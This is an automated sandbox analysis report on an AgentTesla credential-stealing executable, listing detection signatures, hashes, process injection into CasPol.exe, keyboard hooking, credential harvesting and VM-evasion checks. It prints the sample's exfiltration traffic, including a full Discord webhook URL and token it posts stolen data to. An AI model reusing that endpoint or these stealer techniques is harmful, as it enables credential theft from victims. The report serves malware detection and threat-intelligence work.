Edit tour

Windows Analysis Report
e-dekont-20230206.exe

Overview

General Information

Sample Name:	e-dekont-20230206.exe
Analysis ID:	800718
MD5:	33a5f92deee382035467caff29a8d487
SHA1:	7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
SHA256:	e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
Tags:	exegeoTUR
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Snort IDS alert for network traffic

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Contains functionality to register a low level keyboard hook

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains method to dynamically call methods (often used by packers)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

e-dekont-20230206.exe (PID: 5124 cmdline: C:\Users\user\Desktop\e-dekont-20230206.exe MD5: 33A5F92DEEE382035467CAFF29A8D487)

CasPol.exe (PID: 2256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 2256	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 2256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.5 - Destination IP: 162.159.135.232

Timestamp:	192.168.2.5162.159.135.232497034432851779 02/07/23-18:41:32.301093
SID:	2851779
Source Port:	49703
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:41:32 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/strict-transport-security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 795deabcc9628fdd-FRA{"message": "Unknown Webhook", "code": 10015}

Source: CasPol.exe, 00000001.00000002.560208417.0000000006262000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discord.com
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com4Dp

Source: unknown

HTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe

Jump to behavior

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 1_2_06B90290 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000

1_2_06B90290

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D90764	0_2_00007FF9A5D90764
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D96CAD	0_2_00007FF9A5D96CAD
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D90816	0_2_00007FF9A5D90816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A3C5B0	1_2_05A3C5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A317A0	1_2_05A317A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A31772	1_2_05A31772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A301A0	1_2_05A301A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A39328	1_2_05A39328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06B90D20	1_2_06B90D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06B99DF0	1_2_06B99DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06F442D0	1_2_06F442D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06F4E088	1_2_06F4E088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06F4B178	1_2_06F4B178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06F47C08	1_2_06F47C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06F48BC0	1_2_06F48BC0

Source: e-dekont-20230206.exe

Static PE information: No import functions for PE file found

Source: e-dekont-20230206.exe, 00000000.00000000.291653847.0000022E8D92C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296795377.0000022E9F6E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.295935631.0000022E8D9D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe	Binary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe

Source: e-dekont-20230206.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: e-dekont-20230206.exe	ReversingLabs: Detection: 41%
Source: e-dekont-20230206.exe	Virustotal: Detection: 55%

Source: e-dekont-20230206.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\e-dekont-20230206.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\e-dekont-20230206.exe C:\Users\user\Desktop\e-dekont-20230206.exe
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\e-dekont-20230206.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2

Source: e-dekont-20230206.exe	Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: e-dekont-20230206.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: e-dekont-20230206.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: e-dekont-20230206.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
Source:	Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: e-dekont-20230206.exe, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs	.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs	.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs	.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D9826D push edi; retf	0_2_00007FF9A5D9826E
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D9821E push edi; retf	0_2_00007FF9A5D9821F
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D9890E push eax; retf	0_2_00007FF9A5D9890F
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Code function: 0_2_00007FF9A5D9841A push ebp; retf	0_2_00007FF9A5D9841B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A37C9A push eax; retf	1_2_05A37CA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A37499 push FFFFFF8Bh; iretd	1_2_05A3749E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A37CE0 pushfd ; retf	1_2_05A37CE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A38424 push esp; iretd	1_2_05A38829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A337B7 pushad ; iretd	1_2_05A337F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_05A37E40 push 6C66h; ret	1_2_05A37E5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_06B9CF26 push es; retf	1_2_06B9CF2C

Source: e-dekont-20230206.exe

Static PE information: 0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.97077131969678

Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs	High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'

Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
